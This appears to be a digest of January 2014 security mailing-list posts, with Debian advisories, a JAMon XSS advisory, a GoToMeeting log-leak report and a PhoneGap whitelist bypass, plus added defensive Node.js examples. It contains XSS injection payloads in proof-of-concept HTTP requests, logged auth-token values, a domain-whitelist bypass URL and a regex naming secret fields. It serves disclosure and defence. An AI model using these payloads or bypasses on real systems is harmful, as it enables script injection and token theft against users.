[SECURITY] [DSA 2848-1] mysql-5.5 security update
Debian Security Advisory DSA-2848-1                    secur...@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
January 23, 2014                        http://www.debian.org/security/faq

Package        : mysql-5.5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-5891 CVE-2013-5908 CVE-2014-0386 CVE-2014-0393
                 CVE-2014-0401 CVE-2014-0402 CVE-2014-0412 CVE-2014-0420
                 CVE-2014-0437

Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to the new upstream
version 5.5.35. Please see the MySQL 5.5 Release Notes and Oracle's
Critical Patch Update advisory for further details:

http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-34.html
http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-35.html
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

For the stable distribution (wheezy), these problems have been fixed in
version 5.5.35+dfsg-0+wheezy1.

For the unstable distribution (sid), these problems have been fixed in
version 5.5.35+dfsg-1.

We recommend that you upgrade your mysql-5.5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7
01. ### Advisory Information ###

Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation

03. ### Introduction ###

The Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications.
http://jamonapi.sourceforge.net

04. ### Vulnerability Description ###

Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application. JAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks. This flaw exists because certain pages do not validate input before returning it to users.

+------------------------+-----------------------+
| Vulnerable module(s)   | Parameter(s)          |
+------------------------+-----------------------+
| mondetail.jsp          | ArraySQL              |
| mondetail.jsp          | listenertype          |
| mondetail.jsp          | currentlistener       |
| jamonadmin.jsp         | ArraySQL              |
| sql.jsp                | ArraySQL              |
| exceptions.jsp         | ArraySQL              |
+------------------------+-----------------------+

05. ### Technical Description / Proof of Concept Code ###

05.01) Malicious Request (ArraySQL parameter):

The vulnerability is located in the 'Filter (optional)' input field upon submission to the pages

http://localhost/jamon/mondetail.jsp
http://localhost/jamon/jamonadmin.jsp
http://localhost/jamon/sql.jsp
http://localhost/jamon/exceptions.jsp

The application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts. The attacker can inject the malicious JavaScript code

1--1ScRiPt alert('XSS')/ScRiPt!--

in the 'Filter (optional)' input field and click on the GO! button.

05.02) Malicious Request (listenertype parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209

listenertype=1--1ScRiPtalert('XSS')/ScRiPt!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

05.03) Malicious Request (currentlistener parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

listenertype=value&currentlistener=1--1ScRiPtalert('XSS')/ScRiPt!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

06. ### Business Impact ###

This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

07. ### Systems Affected ###

This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this vulnerability.

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 18th, 2013: Vulnerability identification
October 22nd, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMon]
January 23rd, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###
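The following Node.js snippet is an added example; it is not code from the advisory or from the JAMon project. It models the defect class reported above and its fix: renderFilterFieldVulnerable stands in for a JSP that echoes the ArraySQL parameter straight back into the form field, renderFilterFieldFixed HTML-encodes the value first, and classifyReflection is the check a tester runs over a response to tell whether a probe value came back raw, encoded, or not at all. The field markup and the probe string are constructed for the example; only the parameter name ArraySQL comes from the advisory.

```javascript
// Added example, not code from the JAMon advisory or project. Node.js, no dependencies.
// Models the reflected XSS class reported against the 'Filter (optional)' (ArraySQL)
// field and the output-encoding fix.

// Minimal HTML entity encoder for text and quoted attribute contexts.
// Encodes the five characters that can break out of text or a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Stand-in for the JSP that re-populates the form field from the request.
// Vulnerable variant: the request parameter is interpolated unchanged.
function renderFilterFieldVulnerable(arraySql) {
  return `<input type="text" name="ArraySQL" value="${arraySql}">`;
}

// Fixed variant: the parameter is HTML-encoded before it reaches the page.
function renderFilterFieldFixed(arraySql) {
  return `<input type="text" name="ArraySQL" value="${escapeHtml(arraySql)}">`;
}

// Tester-side check: did the probe come back raw, encoded, or not at all?
// A raw reflection of a value containing markup characters is the XSS indicator.
function classifyReflection(body, canary) {
  if (body.includes(canary)) return "raw";
  if (body.includes(escapeHtml(canary))) return "encoded";
  return "absent";
}

// Constructed probe: closes the value attribute and the input tag, then injects a
// script element and opens an HTML comment to swallow the rest of the original tag.
const PROBE = `"><ScRiPt>alert('XSS')</ScRiPt><!--`;

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", classifyReflection(renderFilterFieldVulnerable(PROBE), PROBE));
  console.log("fixed:     ", classifyReflection(renderFilterFieldFixed(PROBE), PROBE));
}
```

In a JSP the equivalent of renderFilterFieldFixed is emitting the parameter through JSTL's `<c:out value="${param.ArraySQL}"/>` or `fn:escapeXml()` rather than a raw scriptlet expression; the encoding has to happen at output time, in the context the value lands in, not by filtering the input.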
[SECURITY] [DSA 2826-2] denyhosts regression update
Debian Security Advisory DSA-2826-2                    secur...@debian.org
http://www.debian.org/security/                         Yves-Alexis Perez
January 23, 2014                        http://www.debian.org/security/faq

Package        : denyhosts
Vulnerability  : regression
Debian Bug     : 734329
CVE ID         : CVE-2013-6890

A regression has been found in the denyhosts packages fixing
CVE-2013-6890. This regression could cause a break-in attempt to be
missed by denyhosts, which would then fail to enforce a ban.

For the oldstable distribution (squeeze), this problem has been fixed in
version 2.6-7+deb6u3.

For the stable distribution (wheezy), this problem has been fixed in
version 2.6-10+deb7u3.

For the testing (jessie) and unstable (sid) distributions, the package
denyhosts has been removed, and its users are encouraged to switch to an
alternative like fail2ban.

We recommend that you upgrade your denyhosts packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output (Android)
1. ADVISORY INFORMATION

Title: GoToMeeting Information Disclosure via Logging Output (Android)
CVE: CVE-2014-1664
CVE Information: ASSIGNED
Date published: PUBLIC
Date of last update: 01/23/2014
Vendor Contacted: Citrix
Release mode: Coordinated Release

2. VULNERABILITY INFORMATION

Class: Information Disclosure
Impact: CVSS Details specified below
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: [CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output (Android)

3. VULNERABILITY DESCRIPTION

The latest release of the software is vulnerable to information disclosure via logging output, resulting in the leak of userID, meeting details, and authentication tokens. Android applications with permissions to read system log files may obtain the leaked information.

4. VULNERABLE PACKAGES

- com.citrixonline.android.gotomeeting-1.apk version 5.0.799.1238 (Android)

5. NON-VULNERABLE PACKAGES

- other platforms untested

6. CREDITS

This vulnerability was discovered and researched by Claudio J. Lacayo.

7. TECHNICAL DESCRIPTION / PROOF OF CONCEPT CODE

--- SNIPPET ---

D/G2M (32190): HttpRequest to: https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal( 787): hal_process_report_ind: Bad item quality: 11
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms
D/G2M (32190): HttpRequest response from: GET https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED] - 200
D/G2M (32190): HttpRequest response body: GET https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED] - {Status:Redirect,RedirectHost:www1.gotomeeting.com,MeetingId:[MEETING_ID_REDACTED]}
D/G2M (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M (32190): HttpRequest to: https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]
D/G2M (32190): HttpRequest response from: GET https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] - 200
D/G2M (32190): HttpRequest response body: GET https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] - {Status:MeetingNotStarted,MeetingId:[MEETING_ID_REDACTED],IsRecurring:false,Endpoints:[Native],OrganizerName:[REDACTED],Subject:[REDACTED],MaxAttendees:100,IsWebinar:false,AudioParameters:{CommParams:{disableUdp:false},ConferenceParams:{supportedModes:VoIP,PSTN,Private,initialMode:Hybrid,SpeakerInfo:{PhoneInfo:[{description:Default,number:[REDACTED],authToken:AAFe4rYexu4Dm7qrL45/Egx+AFLdeSkAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa,accessCode:REDACTED},userId:userId,authToken:EAEBAQEBAQEBAQEBAQEBAQE=,privateMessage:,audioKey:-1,BridgeMutingControl:true,VCBParams:{Codec:[{payloadType:103,frameLength:30,name:ISAC,bitrate:32000,channels:1,samplingRate:16000},{payloadType:0,frameLength:20,name:PCMU,bitrate:64000,channels:1,samplingRate:8000}],VCB:{port:5060,ipAddr:10.23.70.151},Options:{asUpdates:true,rtUpdates:true,dtx:false,EndTime:139023990,StartTime:139023720,IsImpromptu:false}
D/G2M (32190): Got response from legacy JSON API: 200
D/G2M (32190): JoinService: Attempting to join Meeting
D/G2M (32190): MeetingService: Starting Meeting join on legacy...
D/G2M (32190): HttpRequest to: https://www.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M (32190): ServiceResolver: COLService: BaseURL [https://www1.gotomeeting.com], isLegacy [true}, isWebinar [false]
D/G2M (32190): HttpRequest response from: GET https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a - 302
D/G2M (32190): HttpRequest response body: GET
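As an added example (not from the advisory or from the GoToMeeting app), the Node.js snippet below shows the detection side of this finding: parse logcat lines in the default "brief" format, keep only the application's own tag (G2M, as in the snippet above), and list or redact fields of the kind the advisory says were leaked (userId, meeting details, authentication tokens; accessCode also appears in the captured body). The sample log lines, host name and token values are constructed; the last two key names, password and Authorization, are generic additions not taken from the advisory.

```javascript
// Added example, not code from the advisory or the GoToMeeting app. Node.js, no dependencies.
// Scans Android logcat output for application log lines that carry secrets, the pattern
// reported for CVE-2014-1664.

// logcat "brief" format: <priority>/<tag>(<pid>): <message>
const LOGCAT_LINE = /^([VDIWEF])\/(\S+?)\s*\(\s*(\d+)\):\s?(.*)$/;

function parseLogcatLine(line) {
  const m = LOGCAT_LINE.exec(line);
  if (!m) return null;
  return { priority: m[1], tag: m[2], pid: Number(m[3]), message: m[4] };
}

// Field names whose values must never reach a log sink. The first four reflect the data the
// advisory lists as leaked; password and Authorization are generic additions.
const SENSITIVE_KEYS = ["authToken", "accessCode", "userId", "MeetingId", "password", "Authorization"];

// Matches key:value or key=value, with or without quotes around the key and value,
// capturing: 1 = optional quote, 2 = key, 3 = delimiter (incl. optional opening quote), 4 = value.
function sensitiveFieldPattern() {
  const keys = SENSITIVE_KEYS.join("|");
  return new RegExp(`("?)(${keys})\\1(\\s*[:=]\\s*"?)([^",}\\]\\s&]+)`, "gi");
}

// Return every leaked field found in the lines that carry the given tag.
function findLeaks(lines, tag) {
  const leaks = [];
  const re = sensitiveFieldPattern();
  for (const line of lines) {
    const entry = parseLogcatLine(line);
    if (!entry || entry.tag !== tag) continue;
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(entry.message)) !== null) {
      leaks.push({ pid: entry.pid, key: m[2], value: m[4] });
    }
  }
  return leaks;
}

// Redact the same fields in a message, as a log sink filter in the app would have to.
function redact(message) {
  return message.replace(sensitiveFieldPattern(), (_, q, key, delim) => `${q}${key}${q}${delim}[REDACTED]`);
}

// Constructed sample modelled on the advisory's snippet; host, IDs and tokens are made up.
const SAMPLE_LOGCAT = [
  'D/G2M     (32190): HttpRequest to: https://www1.example.test/meeting/getInfo/123456789?android=true&MeetingID=123456789',
  'E/qcom_sensors_hal(  787): hal_process_report_ind: Bad item quality: 11',
  'D/G2M     (32190): HttpRequest response body: GET https://www1.example.test/meeting/getInfo/123456789 - {"Status":"MeetingNotStarted","MeetingId":"123456789","PhoneInfo":[{"number":"+1-555-0100","authToken":"TOKEN-ONE/constructed+value==","accessCode":"1234567"}],"userId":"42","authToken":"TOKEN-TWO-constructed="}',
  'D/G2M     (32190): JoinService: Attempting to join Meeting',
];

if (typeof require !== "undefined" && require.main === module) {
  for (const leak of findLeaks(SAMPLE_LOGCAT, "G2M")) console.log(leak);
}
```

On a device the lines would come from `adb logcat -v brief` (or any app with READ_LOGS on the Android versions the advisory concerns); the app-side fix is not a redaction filter but never writing response bodies or tokens to Log.d in a release build, which the BuildType=releaseBuild field in the captured request shows this build did.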
[CTF] nullcon HackIM 2014 will start at 24-01-2014, when the clock will strike at 11:59 (+5:30 GMT)
· This is blasphemy! This is madness!
· Madness? THIS IS HACKIM!
· H4x0rs! Ready your breakfast and eat hearty, for tonight, we dine in hell!
· No retreat, no surrender. That is H4x0r law. And by H4x0r law, we will stand and fight.. and conquer.

n00bs haXors,

We are proud to present the sixth edition of HackIM 2014 (http://ctf.nullcon.net).

HackIM CTF will start on 24th Jan 2014 at 11:59 PM and will last till 26th Jan 2014 11:59 PM (GMT +5:30).

We've got se7en categories (a total of a whopping 35+ levels!):

- Trivia
- Crypto
- Programming
- Web
- Reverse Engineering
- Exploitation
- Forensics

The winner gets a free VIP Pass for nullcon Goa 2014 (http://www.nullcon.net). If you've already bought the pass we'll reimburse it.

The winner and the top 8 runners-up will get the chance to participate in nullcon JailBreak, along with 4 nights' stay at nullcon JAIL and a FREE VIP pass for nullcon, if they choose to participate in the nullcon JailBreak challenge. In JailBreak, participants will have to stay under house arrest (12th-13th Feb 2014). JailBreak participants can stay at the same venue till 15th of Feb (even after JailBreak).

The unofficial back channel for the CTF is at irc.freenode.net #null0x00

Good luck and have fun :)

Special Thanks to the volunteers and supporters without whom this would not have been possible.
http://ctf.nullcon.net/madprops.php

Cheers
nullcon Team
http://nullcon.net

--
nullcon goa V - spread love... not malware... 12-15th Feb 2014
Security Vulnerabilities in Apache Cordova / PhoneGap
The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap.

##

Dear PhoneGap contributors,

PhoneGap's domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.

1. Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap's internal JavaScript interfaces to the Java objects and access native resources: for example, by calling

   execute = cordova.require('cordova/exec');
   var opts = cordova.require('cordova/plugin/ContactFindOptions');

   and directly operating on these objects.

2. A malicious script running in an iframe can dynamically choose any of PhoneGap's vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack.

3. PhoneGap's whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression:

   this.whiteList.add(Pattern.compile("https?://(.*\\.)?" + origin));

   For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.

4. PhoneGap's domain whitelisting on Android (API 11 or higher) and iOS does not adhere to the same-origin policy. Third-party scripts included using script tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin.

5. Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages.

We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak into PhoneGap's main branch, please let us know.

Thanks,
Martin, Suman, and Vitaly

##
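As an added example that is not part of the email or of the PhoneGap/Cordova code base, the Node.js snippet below reproduces point 3 of the email and contrasts it with an anchored check. vulnerableIsWhitelisted mirrors the quoted Java pattern evaluated with find() semantics (RegExp.prototype.test is unanchored in the same way, and the origin is concatenated in without escaping, so its dots also match any character). hardenedIsWhitelisted parses the URL, accepts only http(s), and matches the host component alone against a pattern anchored at both ends with the origin's regex metacharacters escaped. The whitelisted origin foo.com and the foo.com.evil.com bypass come from the email; the other probe URLs are constructed.

```javascript
// Added example, not from the PhoneGap report or the PhoneGap/Cordova code base.
// Node.js, no dependencies. Shows why the unanchored whitelist pattern quoted in the
// report accepts foo.com.evil.com, and one anchored, host-only replacement.

// Vulnerable form. Mirrors Pattern.compile("https?://(.*\\.)?" + origin) checked with
// Matcher.find(): RegExp.prototype.test is unanchored in the same way, and the origin
// goes into the pattern unescaped, so "." matches any character.
function vulnerableIsWhitelisted(url, origins) {
  return origins.some((origin) => new RegExp("https?://(.*\\.)?" + origin).test(url));
}

// Escape regex metacharacters so a literal origin like "foo.com" cannot match "fooXcom".
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Hardened form: parse the URL, accept only http(s), and test the host component alone
// against a pattern anchored at both ends. "(.*\\.)?" keeps the original intent of
// admitting subdomains of a whitelisted origin.
function hardenedIsWhitelisted(url, origins) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return false; // unparseable input is never whitelisted
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return false;
  const host = parsed.hostname.toLowerCase();
  return origins.some((origin) =>
    new RegExp("^(.*\\.)?" + escapeRegex(origin.toLowerCase()) + "$").test(host));
}

// Whitelisted origin named in the report, and constructed probe URLs.
const WHITELIST = ["foo.com"];
const PROBES = [
  "https://foo.com/index.html",              // whitelisted origin
  "https://api.foo.com/v1",                  // subdomain, whitelisted by design
  "https://foo.com.evil.com/ad.js",          // the bypass described in the report
  "https://evil.com/?next=https://foo.com",  // whitelisted origin only in the query string
  "https://fooXcom/",                        // exploits the unescaped dot in the pattern
  "ftp://foo.com/",                          // wrong scheme
];

// Side-by-side verdicts for one URL.
function compare(url) {
  return {
    url,
    vulnerable: vulnerableIsWhitelisted(url, WHITELIST),
    hardened: hardenedIsWhitelisted(url, WHITELIST),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const p of PROBES) console.log(compare(p));
}
```

Running it prints a verdict pair per probe: the vulnerable check accepts every URL except the ftp one, the hardened check accepts only the first two. The broader lesson is the same one the email makes in point 4: an origin check has to be performed on a parsed origin (scheme and host), never by pattern-matching a whole URL string.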